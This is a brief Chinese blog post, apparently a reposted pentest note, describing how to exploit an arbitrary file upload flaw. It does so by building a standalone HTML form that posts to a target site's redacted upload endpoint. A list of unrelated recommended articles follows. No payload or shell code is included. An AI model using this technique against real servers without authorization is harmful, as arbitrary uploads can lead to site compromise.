构造表单任意文件上传

1、找到一个上传文件的接口

https://XXX.XXXX.com/file/upload

2.1、漏洞利用-创建表单文件1.html

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Title</title>
</head>
<body>
<form action="https://***.*****.com/file/upload" method="post" enctype="multipart/form-data">
	<input type="file" name="file">
	<input type="submit">
</form>
</body>
</html>

2.2、访问1.html并上传文件

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/jiaojiaow/p/15555371.html

推荐文章
linux中权限
js怎么实现继承？
js：实现自定义事件对象接口
《JavaScript高级程序设计》5.5 Function类型
搜狐前端面试
JavaScript异步编程的Promise模式
error while loading shared libraries: libudev.so.0 的问题
2017今日头条前端笔试题（牛客网）
C++实现排序算法
第四次博客作业结对项目
Android Service 基础
Java 泛型进阶
Android GC Log
Android开发从GC root分析内存泄漏
Java Arrays 源码笔记
Android proguard (混淆)
Java注解学习笔记
docker操作
Mac操作快捷
Flex 布局没有效果
是否需要self.loss.cuda()
多loss的反向传播路径
RuntimeError: Function 'AddmmBackward' returned nan values in its 2th output.
【转载】Linux下configure命令详细介绍
【转载】移植FFMpeg到VC环境心得
【转载】WIN7环境下Virtualbox虚拟机Ubuntu系统共享文件夹设置
【转载】在Ubuntu中使用Android NDK编译FFmpeg
CYGWIN下编译FFMpeg
Linux操作系统安装应用程序
CapsNet胶囊网络（理解）